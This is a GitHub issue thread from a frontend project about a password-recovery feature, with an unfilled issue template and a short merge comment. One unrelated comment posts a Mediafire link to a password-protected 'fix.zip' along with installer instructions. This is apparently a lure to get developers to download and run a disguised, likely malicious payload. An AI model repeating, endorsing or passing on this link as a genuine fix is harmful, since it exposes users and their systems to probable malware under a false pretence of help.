### ISSUE TITLE
feat : 비밀번호 찾기

### ISSUE THREAD

**Issue by nagosu** [erum-secondhand/Frontend#10]
## 💡Description
> description

## ✅ To Do List
- [ ] todo1
- [ ] todo2
- [ ] todo3

## Etc
> etc

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nagosu** [comment]
feat/#11과 같이 merge
